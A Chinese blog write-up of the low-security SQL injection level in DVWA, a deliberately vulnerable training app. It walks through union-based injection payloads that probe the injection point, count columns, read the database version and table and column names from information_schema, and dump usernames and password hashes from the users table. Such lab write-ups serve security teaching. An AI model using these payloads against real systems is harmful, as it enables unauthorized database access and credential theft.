dvwa闯关——low级SQL

社会主义新天地 提交于 2020-01-07 04:59:16

sql注入:攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

一、判断是否存在注入点:

  1.1;正常

  

 

   2.1‘;加上一个单引号报错

  

 

   3.1’ and '1'='1;正常

  

 

   说明存在注入点

二、判断字段数

  1.1' order by 2#

  

 

   2.1' order by 3#;到3就报错了,说明只有两个字段

   

 

 三、确定回显位置

  1' union select 1,2#

  

 

 四、查询当前数据库和版本

  1' union select version(),database()#

  

 

 五、获取数据库中的表

  1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

  

 

 六、获取users表中的字段名

  1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

  

 

 七、获取表中的一些数据

  1' union select user,password from users#

  

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!